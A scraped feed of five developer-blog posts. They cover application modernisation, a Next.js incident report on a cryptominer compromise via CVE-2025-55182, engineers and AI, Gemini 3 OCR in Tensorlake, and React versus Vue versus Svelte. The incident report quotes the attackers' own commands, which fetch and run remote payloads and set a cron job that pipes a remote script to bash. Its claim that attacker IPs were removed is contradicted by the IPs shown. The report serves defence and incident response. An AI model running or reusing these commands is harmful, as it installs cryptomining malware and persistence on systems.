The Practical Developer

A constructive and inclusive social network for software developers.

The Future of Digital Agility: Why Application Modernisation Matters Now More Than Ever

2025-12-08 14:07:59

Application modernisation has rapidly moved from a forward-looking strategy to an urgent necessity as businesses confront accelerating digital demands. Legacy software that once powered growth is now slowing organisations down, with studies showing that outdated systems increase operational costs by nearly 40% and contribute to over 60% of unexpected downtime incidents globally. In an era where speed, scalability, and seamless digital experiences define market leaders, companies embracing application modernisation are the ones staying ahead—while others fall behind in the race for innovation.

Modern consumers expect applications to be fast, intuitive, secure, and available at all times. Yet many enterprises still depend on monolithic architectures and on-premise systems that cannot keep up with rapid shifts in user behaviour or spikes in traffic. Application modernisation bridges this gap. By transitioning legacy environments into modern cloud-native architectures, organisations gain the ability to scale on demand, deploy updates faster, and build resilience into every layer of their digital ecosystem. This shift is not simply an IT upgrade; it is a transformation of how businesses operate and compete.

Global cloud adoption statistics underline the momentum behind modernisation. According to industry data, more than 91% of enterprises now use at least one cloud service, while 70% are actively pursuing strategies to modernise existing applications. The push is driven not just by performance, but by cost efficiency. Modernised applications reduce infrastructure spend, enhance resource utilisation, and minimise technical debt—freeing organisations to invest more in innovation. The combination of containerisation, microservices, DevOps practices, and serverless computing empowers businesses to deliver new features in days instead of months.

In the middle of this shift, specialised partners are playing a crucial role. Companies like Cloudzenia, for instance, help organisations navigate their application modernisation journey with tailored cloud-native solutions, smooth migration strategies, and ongoing optimisation support. Their expertise ensures that businesses not only modernise but also extract maximum value from their applications in the cloud, which is why so many decision-makers today are searching for partners who specialise in legacy system transformation.

Security also sits at the heart of modernisation. Today’s cyber-threat landscape is more sophisticated than ever, and legacy systems—often unpatched or minimally supported—create critical vulnerabilities. Modern architectures integrate advanced security frameworks, automated compliance controls, and real-time threat detection. This reduces breach risks significantly and allows businesses to maintain customer trust, which is essential in industries where even seconds of downtime can impact millions.

Another pivotal advantage of application modernisation is enhanced user experience. The modern consumer journey is driven by personalisation, connected touchpoints, and immersive digital interactions. Modernised applications can integrate AI-driven recommendations, real-time analytics, and omnichannel support, enabling brands to deliver experiences that feel seamless and intelligent. This capability directly influences retention rates; research shows that well-optimised, modern applications can boost customer satisfaction by up to 30% and conversion rates by nearly 20%.

As businesses scale globally, application modernisation also ensures operational continuity. Cloud-native systems provide high availability, automated disaster recovery, and fault tolerance. This eliminates risks associated with hardware failures or regional outages. Furthermore, organisations transitioning from legacy systems often see improvements in team productivity because modern environments support better collaboration, streamlined workflows, and integrated DevOps pipelines.

The future of digital transformation hinges on how effectively businesses modernise their applications today. With the world becoming increasingly data-driven, modernisation is not optional—it is foundational. Organisations that act now gain the ability to innovate faster, compete more effectively, and deliver secure, high-quality experiences at scale. Those that delay risk falling behind as technology continues to evolve at unprecedented speed.

Application modernisation is ultimately a strategic investment in long-term agility. It empowers businesses to unlock hidden potential within their systems, leverage emerging technologies, and create a flexible digital infrastructure built for the future. The organisations embracing this journey today will be the ones shaping tomorrow’s market landscape.

We Got Hacked: How CVE-2025-55182 Turned Our Next.js App Into a Crypto Mine

2025-12-08 14:05:36

How We Got Exploited by CVE-2025-55182 and What We Learned

TL;DR: Our Next.js application was compromised 2 days after CVE-2025-55182 was publicly disclosed. A critical Remote Code Execution vulnerability in React Server Components allowed an attacker to deploy cryptomining malware. Full remediation took 15 minutes. Here's how it happened and how you can protect yourself.

The Call That Changed Everything

8:30 AM - Slack notification: "Admin panel is down. Gateway errors everywhere."

8:32 AM - We discovered our PM2 process list looked like a horror story:

│ 0  │ boss-backend        │ waiting │ 8450 │ 0%  │

The backend had crashed 8,450 times. Something was seriously wrong.

Discovery: The Smoking Gun

While investigating the crash logs, our security monitor revealed something alarming that had been running undetected for ~2 days:

WARNING: High CPU processes detected: /tmp/kdevtmpfsi 352%
WARNING: High CPU processes detected: /tmp/kdevtmpfsi 352%
WARNING: High CPU processes detected: /tmp/kdevtmpfsi 352%

kdevtmpfsi - a well-known cryptominer malware signature.

Our server was being used to mine cryptocurrency. And we didn't even know it.
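
If you want to run the same sanity check on a server you suspect, the top of the process list usually gives the game away. A minimal sketch: any unfamiliar process pinned at several hundred percent CPU, especially one running out of /tmp, deserves a closer look.

ps aux --sort=-%cpu | head -n 6   # the five hungriest processes, plus the header row
ls -l /tmp /var/tmp               # droppers and miners like kinsing/kdevtmpfsi often live here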

The Vulnerability: CVE-2025-55182

On December 3rd, a critical vulnerability (CVSS 10.0) was disclosed affecting React Server Components and Next.js:

Detail              Value
CVE ID              CVE-2025-55182
Affected Component  React Server Components (RSC)
Affected Versions   Next.js 15.x (before patches), React 19.0-19.2
Our Version         Next.js 15.5.0 ❌
Attack Vector       Network, no authentication required
CVSS Score          10.0 (Critical)

Why It's So Dangerous

The vulnerability exists in the React Server Components "Flight" protocol, which handles serialization/deserialization between server and client. Due to insecure deserialization, an attacker can craft a malicious HTTP request that executes arbitrary code on your server.

Key characteristics:

  • ✗ No authentication required
  • ✗ Works on default configurations
  • ✗ Public exploits are available
  • ✗ One request is all it takes

Your existing firewall, rate limiting, and Fail2ban rules won't help. This is an application-level vulnerability, not a network-level one.

How We Got Pwned (Timeline)

Based on log analysis, here's exactly what happened:

December 5, 2025

12:30 PM - First attack attempt logged:

Error: Command failed: wget http://45.76.155.14/vim -O /tmp/vim; 
chmod +x /tmp/vim; nohup /tmp/vim > /dev/null 2>&1

The attacker was downloading and executing a malicious binary disguised as "vim".

1:50 PM - Second wave: Botnet deployment attempts

wget -q http://194.69.203.32:81/hiddenbink/react.sh -O bins.sh; 
chmod 777 bins.sh; ./bins.sh

5:01 PM - The real payload: Kinsing cryptominer

wget http://193.34.213.150/nuts/lc -O /tmp/config.json
wget http://193.34.213.150/nuts/x -O /tmp/fghgf

December 6, 2025

~Midnight - The cryptominer kdevtmpfsi spawns and starts consuming 352% CPU (3.5 cores)

7:04 PM - Attacker establishes persistence by installing malicious cron jobs

December 8, 2025

5:33 AM - System becomes unresponsive. Investigation begins.

What the Attacker Actually Got

After forensic analysis, we discovered:

Installed Malware

  1. Kinsing (/tmp/kinsing) - Dropper/loader
  2. Kdevtmpfsi (/tmp/kdevtmpfsi) - XMRig-based Monero cryptominer
  3. Libsystem.so (/tmp/libsystem.so) - LD_PRELOAD rootkit (process hiding)
  4. Config.json (/tmp/config.json) - Mining pool configuration

Persistence Mechanisms

The attacker added multiple cron jobs to ensure reinfection:

@reboot /usr/bin/.kworker react 20.193.135.188:443
* * * * * wget -q -O - http://80.64.16.241/re.sh | bash

That last line runs every minute - a "phone home" mechanism that ensures the malware comes back even if manually removed.
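
If you suspect a similar infection, the usual persistence spots are quick to audit. A rough checklist (paths vary slightly by distribution):

crontab -l                          # current user's cron jobs
sudo ls /etc/cron.d /etc/cron.*ly   # system-wide cron drop-in directories
sudo ls /var/spool/cron*            # per-user crontab files (exact location differs by distro)
systemctl list-timers --all         # systemd timers are another common persistence mechanism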

What They DIDN'T Get

No data exfiltration - This was CPU theft, not data theft

No root access - Attacker was limited to user-level permissions

No lateral movement - Attack was isolated to this single server

The good news: This was resource consumption, not information theft. But still incredibly embarrassing.

How Our Security Failed Us

We had multiple security layers in place. They all failed:

Security Measure    Why It Failed
Fail2ban            Designed for brute-force attacks, not code injection
UFW Firewall        Attack came through legitimate HTTPS (port 443)
Redis Auth          Attack didn't target Redis; it used HTTP
Security Monitor    Detected kdevtmpfsi but didn't recognize it as malware

The root cause: Over-reliance on perimeter security instead of application-level protection.

Remediation (15 Minutes)

Step 1: Kill the Malware

sudo kill -9 $(pgrep -f kdevtmpfsi)
sudo kill -9 $(pgrep -f kinsing)
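# Note: the "phone home" cron job shown earlier re-downloads the miner every minute,
# so these processes will keep respawning until the crontab is cleaned in Step 2.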

Step 2: Remove Persistence

# Clean crontab
echo "*/5 * * * * /path/to/legitimate-monitor.sh" | crontab -

# Remove malware files
sudo rm -f /tmp/kinsing /tmp/kdevtmpfsi /tmp/libsystem.so /tmp/config.json

Step 3: Patch the Application

cd apps/web
npm install next@<patched-version> react@<patched-version> react-dom@<patched-version>
npm run build
pm2 restart boss-frontend

Step 4: Verify

npm list next
# ✓ next@<patched-version> (patched version confirmed)

Total time: ~15 minutes from discovery to full recovery.

Lessons Learned

What Went Wrong

  1. Delayed Patching - CVE disclosed Dec 3, we were exploited Dec 5 (2-day window)
  2. Incomplete Detection - Security monitor didn't recognize the malware process
  3. No Outbound Monitoring - Couldn't detect connections to mining pools
  4. Overconfidence - Assumed perimeter security was enough

What Went Right

  1. Existing Monitoring - PM2 made it obvious something was crashing repeatedly
  2. Quick Response - Once discovered, full containment in minutes
  3. Limited Damage - Resource theft, not data theft
  4. Automated Tools - PM2 and npm made recovery fast

How to Protect Yourself

Immediate Actions (Do These Now)

  1. Check Your Version

npm list next
npm list react
npm list react-dom

If you're on Next.js 15.x, 16.x or React 19.0-19.2, you're vulnerable.

  2. Update to Patched Versions

npm install next@latest react@latest react-dom@latest
npm run build

  3. Subscribe to Security Advisories
  4. Add npm audit to your CI/CD pipeline
  5. Enable Dependabot or Snyk for automated alerts
  6. Subscribe to Vercel security updates

Short-Term Protections (This Week)

  1. Enable WAF Rules
    If using Cloudflare, AWS WAF, or Vercel, enable their RSC protection rules. They've already deployed specific defenses for CVE-2025-55182.

  2. Add Dependency Scanning to CI/CD

npm audit --audit-level=high

Fail the build if critical vulnerabilities are found.
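
As a minimal sketch, assuming an npm project with a lockfile (adapt the commands to your CI runner):

#!/usr/bin/env bash
# Hypothetical CI gate: the job fails if any high or critical advisory is open.
set -euo pipefail

npm ci                           # clean, reproducible install from package-lock.json
npm audit --audit-level=high     # exits non-zero on high/critical findings, failing the build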

Long-Term Improvements (This Month)

  1. Monitor Outbound Connections
    Log and alert on unusual outbound network traffic. Mining pools typically connect to known IPs.

  2. Implement CPU/Memory Limits
    Use cgroups or container limits to alert when processes exceed thresholds.

  3. File Integrity Monitoring
    Monitor /tmp and other writable directories for new executable files (see the watchdog sketch after this list, which pairs this with a CPU check).

  4. Consider Containerization
    If not already done, containerizing your application provides better resource isolation and easier recovery.
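
Here is a minimal watchdog sketch tying the file-integrity and CPU checks together. It is deliberately naive: the 200% threshold, the scanned directories, and the logger-based alert are placeholders to adapt, and it is a stop-gap rather than a replacement for a real host intrusion detection system.

#!/usr/bin/env bash
# Naive watchdog: flag executables in temp directories and processes burning unexpected CPU.
# Run it from cron every few minutes.
set -u

alert() { logger -t watchdog "$1"; }    # swap for mail, Slack, or a webhook

# 1. Executable files in /tmp and /var/tmp (where kinsing/kdevtmpfsi landed)
find /tmp /var/tmp -maxdepth 1 -type f -perm /111 -print 2>/dev/null | while read -r f; do
  alert "Executable file in temp dir: $f"
done

# 2. Any process using more than 200% CPU (i.e. pinned on more than two cores)
ps -eo pid,pcpu,comm --sort=-pcpu | awk 'NR > 1 && $2 > 200 {print $1, $2, $3}' |
  while read -r pid cpu comm; do
    alert "High CPU process: $comm (pid $pid, ${cpu}% CPU)"
  done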

Key Takeaways

  • Patch immediately - A 2-day window is all attackers need
  • Application security matters - Your firewall won't save you from RCE
  • Perimeter defense is incomplete - You need defense-in-depth
  • Detect and respond quickly - We went from compromise to recovery in 15 minutes because we had good monitoring
  • Share knowledge - Every attacker learns from every successful exploit; the community benefits from incident reports

Questions?

If you're running Next.js or React Server Components, now is the time to patch. Don't wait 2 days like we did.

Have you been affected by this vulnerability? Share your experience in the comments.

This incident report has been sanitized to protect sensitive system details while sharing valuable security lessons with the community. All infrastructure details, IP addresses of attacker infrastructure, and specific server configurations have been removed or generalized.

How Software Engineers Can Stay Relevant in the Age of AI

2025-12-08 13:59:56

Imagine waking up one day to find that the skills you’ve spent years mastering are suddenly being performed faster, cheaper, and more efficiently by AI. This isn’t science fiction - it’s the reality facing software engineers today.

In 2001, a professor told his students that software engineering was a golden ticket to job security. Fast forward to 2025, and the CEO of GitHub declared that the future of programming is natural language. The prediction came true - but not in the way anyone expected. AI is now capable of writing code, fixing bugs, and even generating entire projects from natural language prompts. Tools like GitHub Copilot and ChatGPT are changing the game, raising a critical question:
How can software engineers stay relevant in an era where AI is becoming a co-pilot - or even a competitor? ⛔

Don’t be afraid, this isn’t the end of software engineering. It’s the beginning of a new chapter. Let’s explore how you can not only stay relevant but thrive in the age of AI.

🧠 1. AI’s Capabilities and Limitations: What You Need to Know

AI can do vs. can't do

💪 What AI Can Do

  • Generate code fast: Can produce large, functional codebases within seconds.
  • Translate languages: Converts code between languages (e.g., Python ⇄ JavaScript).
  • Automate fixes & tasks: Helps with debugging, testing, repetitive work, and UI generation.

🙏 What AI Can’t Do

  • Understand the “why”: Lacks human intuition and real context.
  • Think strategically: Can’t handle long-term planning, trade-offs, or ethics well.
  • Communicate & collaborate: Cannot replace human empathy or teamwork.
  • Be fully reliable: May hallucinate or produce incorrect code; most AI code still needs human review.

📌 AI is like a brilliant junior developer: it can do a lot quickly, but it's up to us to define the vision, validate the results, and ensure what we're building is good for society.

junior dev meme

🛠️ 2. The Evolving Role of Software Engineers: Beyond Coding

Software engineering has never been just about writing code. It’s about solving problems, understanding user needs, and making tough decisions.

In the AI era, the role of engineers is evolving:
coders to visionaries

Look at the image, and you’ll understand why engineers are still essential.

  • Understanding AI: Engineers don’t just prompt AI - they understand the models, data pipelines, and risks.
  • Building Better Software: Anyone can prototype a demo with AI, but engineers build scalable, maintainable, and secure systems.
  • Improving AI: Engineers fine-tune models, optimize performance, and make AI accessible to everyone.

📌 We’re not just building software anymore - we’re building the future of intelligence itself.

📚 3. How to Prepare for the Future: Foundations & Practical Steps

Master the Foundations

  • Data Structures and Algorithms: These are the bedrock of adaptability. Spend time mastering them.
  • Full-Stack Thinking: The days of specializing in just frontend or backend are fading. Future engineers must be versatile, bridging gaps between design, product management, and data.

Develop Soft Skills

  • Communication and Collaboration: AI can’t replace human connection. Engineers who can explain complex ideas and work well in teams will stand out.
  • Leadership: Engineers are becoming leaders - not just of teams, but of AI itself.

Embrace AI as a Creative Partner

  • Use AI to prototype, automate repetitive tasks, and explore generative tools.
  • Treat AI like a teammate: discuss projects, delegate work, and iterate together.

Stay Adaptable

  • Tools change, but principles like critical thinking and problem-solving endure.
  • Focus on learning how to learn. Adaptability will define leadership in the AI era.

📌 In the future, engineers won’t just lead teams - they’ll lead AI too.

Final Thoughts: Are You an AI Zombie or an AI Master?

So, here’s the deal: AI isn’t just knocking on the door - it’s already inside, raiding your fridge and rearranging your code. The question is, are you using AI, or is AI using you?

Let’s talk numbers, because numbers don’t lie (unless they’re generated by AI, of course):

  • 55% of developers are using tools like GitHub Copilot. If you're not in that 55%, congratulations! You're officially a manual laborer in a world of cyborgs. Enjoy your handwritten loops and debugging marathons.
  • Only 30% of those developers accept AI-generated code without changes. If you're in that 30%, you're in danger, my friend.
  • 68% of developers (per Stack Overflow 2025) use AI tools daily, cutting repetitive tasks by 40%.

📌 The future isn’t about fearing AI - it’s about mastering it.

Share your thoughts: How are you adapting to AI in your work? Let’s discuss in the comments!
Stay curious: Follow tech blogs, attend webinars, and experiment with AI tools.
Keep learning: The best engineers never stop growing.

Gemini 3 is Now Available as an OCR Model in Tensorlake

2025-12-08 13:57:26

Gemini 3 is now available within Tensorlake

Google’s Gemini models have been great at document parsing since 2.5 Flash, and the latest Gemini 3 pushes the envelope even further. It has the lowest edit distance (0.115) on OmniDocBench, compared to GPT-5.1 (0.147) and Claude Sonnet 4.5.

Starting today, you can use Gemini as an OCR engine with Tensorlake’s Document Ingestion API. You can ingest documents in bulk and convert them into Markdown, classify pages, or extract structured data using a JSON schema. Tensorlake takes care of queuing, managing rate limits, and sending you webhooks as documents are processed.

We put Gemini 3 to the test inside Tensorlake, and the results on "hostile" document layouts were immediate.

Case Study 1: Table Structure Recognition

Document: Google 2024 Environmental Report

Financial and scientific reports use visual cues, like indentation, floating columns, and symbols, to convey meaning. To test this, we fed the complex "Water Use" table from the Appendix into Gemini 3.

Google environment report

The Challenge

The table is semi-borderless: lines separate only some of the rows, the columns have no boundaries at all, and the column on the right is disconnected from the main block.

The Gemini 3 Result: Visual Understanding

Gemini 3 does a perfect job of understanding this table. This is a screenshot from the Tensorlake Cloud Dashboard.

Google environment result

Case Study 2: VQA + Structured Output

Document: House Floor Plans

We wanted to test whether Gemini 3 could parse visual symbols on construction documents, so we plugged it into Tensorlake’s Structured Extraction pipeline.

The Input: A raw PDF of a house plan and a Pydantic schema defining the exact fields we needed (e.g., kitchen_outlets: int, description: Number of standard and GFI electrical outlets, as noted by the legend icon labeled "outlet", that are found in the kitchen and dining nook.).

For reference, here is the kitchen+dining nook area.

Kitchen Dining diagram

The circles with two lines through them are the outlets, as per the legend on the same page:

Kitchen dining legend

The Challenge

There is no text label saying "Outlet" on the diagram; the meaning is carried only by the symbol in the legend. The model must identify the specific circle-and-line icon defined in the legend, spatially constrain its search to the visual boundaries of the "Kitchen," and aggregate the count into our JSON structure.

The Result

Gemini 3 successfully understood the visual diagram. It returned a valid JSON object with 6 outlets, correctly distinguishing them from nearby data ports and switches.

Kitchen dining result

Tensorlake blends specialized OCR models and VLMs into a set of convenient APIs. While you could call the Gemini API directly, you would be rebuilding many undifferentiated aspects of a production pipeline. Gemini 3 is now fully integrated with Tensorlake DocAI APIs to read, classify, and extract information from documents.

Tensorlake solves the two biggest headaches of building Document Ingestion APIs using VLMs:

  1. Bulk Ingestion & Rate Limits: From our observation, Gemini 3 doesn’t handle spiky traffic very well. Throwing 10,000 documents at it will trigger errors due to strict quotas. Tensorlake manages the queue, handling back-off and retries automatically so you can ingest massive datasets without hitting 429 errors.

  2. Chunking Large Files: Tensorlake automatically splits large documents into 25-page chunks so that Gemini can extract even the densest pages, and ensures the 64k output token limit is not exceeded.

When to use (and NOT use) Gemini 3

Use Gemini 3 when:

  • Complex Visual Reasoning is required: You need to correlate a chart's color legend to a data table, or count symbols on a blueprint (as shown in the house plan example).

Do NOT use Gemini 3 when:

  • You need bounding boxes for citation: Gemini 3 does not perform layout detection of objects in documents, so it is not the right choice if your application requires strict bounding boxes to highlight exactly where a specific paragraph or number came from.

  • You need strict text style and font detection: Visual nuances like strikethroughs, underlines, or specific font colors are often ignored by VLMs, which focus on the "content" rather than the style.

For these tasks, you should use one of Tensorlake’s specialized models, like Model03.

How to use Gemini 3 with Tensorlake

Playground

Gemini 3 is available today in the Tensorlake Playground for experimentation:

Playground settings

Or you can select it with our HTTP API or SDK:

from tensorlake.documentai import DocumentAI, ParsingOptions

client = DocumentAI()

# Parse the document using Gemini 3 as the OCR engine
parse_id = client.read(
  file_url="https://tlake.link/docs/real-estate-agreement",
  parsing_options=ParsingOptions(
    ocr_model="gemini3"
  )
)

# Fetch the parsed output once processing completes
result = client.result(parse_id)

What's Next

Document ingestion has a lot of edge cases. We want our users to always have access to state-of-the-art models so they can adapt their OCR pipelines to new use cases quickly, with minimal code changes.

We will add more Foundation Models as OCR model options in Tensorlake’s Document Ingestion API.

Try Tensorlake free

Want to discuss your specific use case?
Schedule a technical demo with our team.

Questions about the benchmark?
Join our Slack community

React vs Vue vs Svelte — Which One Should You Learn in 2025?

2025-12-08 13:46:07

The cursor on our screen has been blinking at the same rate since the day computers were born, but everything behind it has changed. There was a time when we just wrote scripts to make a menu dropdown work. Now, we architect ecosystems.

It is 2025. The sensory overload of the modern developer experience is deafening. You stare at the blank terminal, feeling the invisible weight of a node_modules folder that hasn’t even been installed yet. You check X (or Twitter) and see five influencers claiming the tool you learned last week is now "dead."

It is exhausting.

But here’s the reality we need to accept: The AI code assistants — Copilot, Cursor, the models integrated into our IDEs — are doing the heavy lifting now. They generate the boilerplate. They write the tests. Because of this, the choice of a framework in 2025 is no longer just about syntax or typing speed.

It is about philosophy.

When the AI gets it wrong — and it will get it wrong — you are the one who has to debug the hallucination. You need a mental model that aligns with your brain. We aren’t just choosing tools anymore; we are choosing the constraints we are willing to live with. This isn’t a battle of benchmarks. It is a battle of ideologies.

The Goliath That Pays the Rent

Photo by Lautaro Andreani on Unsplash

If the JavaScript ecosystem were a physical place, React would be a sprawling, industrial metropolis. It is crowded. It is loud. The construction never stops.

You look up and see the cranes building React Server Components. You look down and see the subway lines of Suspense boundaries. It is a marvel of engineering, but it is not a place for a quiet stroll.

For a long time, React was just a library. In 2025, React is an architecture. The shift has been profound. We moved from simple client-side rendering to a world where the lines between server and client are blurred so aggressively that you sometimes forget which side of the network boundary you are standing on.

This feels like corporate professionalism. It is the “safe” bet. If you are working for a Fortune 500 company, you are likely writing React. But safety comes at a cost. The cost is cognitive load.

You don’t just “write” React anymore; you negotiate with it.

You have to think in complex abstractions. You have to understand referential equality to stop your component from re-rendering infinite times. You have to manage dependency arrays like you are diffusing a bomb.

Look at the mental gymnastics required just to handle a side effect correctly without causing a memory leak or a stale closure:

// The "Negotiation"
useEffect(() => {
  const controller = new AbortController();

  async function fetchData() {
    try {
      const data = await api.get('/user', { signal: controller.signal });
      setState(data);
    } catch (e) {
      if (e.name !== 'AbortError') handleError(e);
    }
  }

  fetchData();

  return () => controller.abort(); // Cleaning up the mess
}, [dependency1, dependency2]); // Don't get this wrong

It is verbose. It requires you to know how the machine works to keep it humming.

But here is the truth: The infrastructure is unbreakable. When you need to scale to millions of users, when you need an ecosystem of libraries that covers every edge case imaginable, React is the only one that guarantees a solution exists. It might be a painful solution, but it exists.

React feels like wearing a suit. It’s not always comfortable, but it gets you into the important meetings.

The Garden That Grows With You

Photo by Rahul Mishra on Unsplash

If React is the metropolis, Vue is a well-tended community garden. It has structure — there are raised beds and designated paths — but it lets the plants grow wild if they need to.

It is the “Goldilocks” zone of 2025.

Vue has managed a very difficult trick. It evolved without alienating its people. While other frameworks burned down their houses to build new ones, Vue simply added a new wing. We have the Composition API now, and with the introduction of “Vapor Mode,” Vue has become incredibly performant, ditching the Virtual DOM where necessary to compete with the fastest tools out there.

But it didn’t lose its soul.

There is a distinct lack of ego in the Vue ecosystem. It feels like the framework for the pragmatist. The developer who uses Vue is often the one who wants to build a great product, ship it, and go home at 5 PM to see their family. They aren’t interested in arguing about hydration strategies on social media. They just want the v-model to bind the input, and it does.

Vue respects the legacy of the web. It doesn’t treat HTML and CSS as annoyances that need to be encapsulated in JavaScript. It embraces them.

Look at the Composition API. It looks surprisingly similar to React’s hooks, but notice the absence of the dependency array anxiety:

<script setup>
import { ref, watchEffect } from 'vue';

const count = ref(0);
const double = ref(0);

// It just tracks dependencies automatically. 
// No manual arrays. No stale closures.
watchEffect(() => {
  double.value = count.value * 2; 
  console.log(`Count is ${count.value}`);
});
</script>

It feels less rigid. You aren’t fighting the framework; you are collaborating with it. The mental model is “reactivity,” not “rendering cycles.” It is a subtle difference, but after eight hours of coding, it is the difference between a headache and a sense of accomplishment.

When the Framework Disappears

Photo by Ferenc Almasi on Unsplash

Then, there is Svelte.

If React is a bus and Vue is a sedan, then Svelte is a bicycle. There is no engine, no transmission, no complex machinery. Just your legs and the road. The distance between your thought and the screen is the shortest here.

In 2025, Svelte has grown up. With the release of Svelte 5 and the introduction of “Runes,” the framework made a hard choice. It sacrificed a tiny bit of its “magic” for predictability.

For years, Svelte was magical. You assigned a variable, and the DOM updated. But as apps got larger, the magic became confusing. “Why didn’t that update?” became a common question. Runes make reactivity an explicit opt-in, which makes the code clearer for both humans and the AI assistants helping us write it.

But the charm of Svelte remains untouched.

It is the feeling of realizing there is no Virtual DOM. The browser is doing the work. It is raw, efficient, and rebellious. It reminds you that the web platform is actually really good if we stop adding layers on top of it.

Compare a simple state update. In React, you call a function to request a change. In Svelte, you just change the value.

// React: Asking permission
setCount(prev => prev + 1);

// Svelte: Just doing it
count += 1;

Look at that difference. Really look at it. Why did we ever convince ourselves that the first way was better?

Svelte creates a direct connection between your logic and the user interface. It feels tactile. When you code in Svelte, you feel like a sketch artist. You aren’t building a blueprint; you are drawing directly on the canvas. It is fun. And in a job that is often stressful, joy is a metric that is severely undervalued.

The Friction of a Button Click

Let’s talk about the “feel” of coding, not the benchmarks. Users cannot tell the difference between a millisecond render in React or Vue. Their phones are fast enough.

But you can tell the difference.

Imagine you are building a dynamic form where a user adds fields to a list.

In React, you are an architect. You need to manage the state of the array. You need to ensure the keys are unique so the diffing algorithm doesn’t get confused. You wrap the input handlers in useCallback to prevent child components from re-rendering unnecessarily. You are building a structure that will withstand an earthquake, even if you are just building a shed.

In Svelte, you are a sketch artist. You create an array. You loop over it with a {#each} block. You bind the inputs directly to the array values. It takes five minutes. It works. The code is half the size.

In Vue, you are a carpenter with a really good jig. You use v-for. You use v-model. It feels structured like React but snappy like Svelte.

Here is the nuance, though. Joy doesn’t always scale.

Svelte is incredibly fun until your application becomes massive. When you have fifty developers working on the same codebase, the “magic” can become a liability. React is painful at the start. It feels like overkill. But when the app becomes a monolith, React’s strictness saves your life. It enforces a discipline that prevents the code from turning into spaghetti.

Choosing Your Handcuffs

Photo by Grianghraf on Unsplash

We need to stop looking for a “winner.” There is no winner. Every framework restricts you in some way. You are simply choosing which handcuffs you prefer to wear.

The decision in 2025 should be based on your context, not the hype.

Choose React if you want to be a cog in a very expensive, high-functioning machine. If you aim for Enterprise jobs, Big Tech roles, or large-scale SaaS products, React is the language of business. It pays the best because it solves the most expensive problems.

Choose Vue if you value mental peace. If you work in a digital agency, a mid-sized team, or a startup where delivery speed matters more than theoretical purity, Vue is your friend. It lets you move fast without breaking things.

Choose Svelte if you are an indie hacker, a solo developer, or someone who creates for the sheer love of the craft. If you are building a tool for yourself or a small SaaS where you are the only developer, Svelte will allow you to move at the speed of thought.

There is also the AI Factor to consider.

Since AI is writing a lot of our boilerplate in 2025, Svelte’s brevity matters slightly less than it used to. We don’t mind verbose code as much if we aren’t typing every character. However, reading code is still a human job.

When the AI breaks the code, which one do you prefer to debug? Do you want to debug a complex chain of React hooks, or do you want to debug a Svelte script that looks like standard JavaScript?

The complexity of React matters less because the AI handles it, but the readability of Svelte and Vue matters more because you are spending more time reviewing code than writing it.

The Cursor Only Blinks If You Do

I want you to pull back from the technical debate for a second.

The user doesn’t care.

The person clicking the “Buy Now” button does not know what a Virtual DOM is. The browser rendering the pixels doesn’t care if they came from a compiled Svelte file or a React fiber tree.

The anxiety you feel about “choosing the wrong one” is often just a sophisticated form of procrastination. We tell ourselves we are researching, but really, we are scared of starting. We are scared that if we pick Vue, React will take over the world. We are scared that if we pick React, we are missing out on the simplicity of Svelte.

The “best” framework is the one that gets you to the deploy state before you lose interest in the idea.

Tools change. The syntax fades. I guarantee you that in five years, we will be having this conversation about three completely different tools. Or perhaps we won’t be writing code at all.

But the ability to solve a problem? The ability to take a vague human requirement and turn it into a functioning piece of logic? That is the only dependency that never deprecates.

So, look at that blinking cursor. It is waiting for you. Pick a tool, any tool, and just start typing. The only wrong choice is the one that leaves the screen blank.

👋 Thanks for reading!

If you enjoyed this, check out some of my other top-rated articles and the tools I'm building.

🚀 Projects I've Built

  • DataViz Kit – A suite of free tools to create stunning data visualizations for developers and writers.

More Articles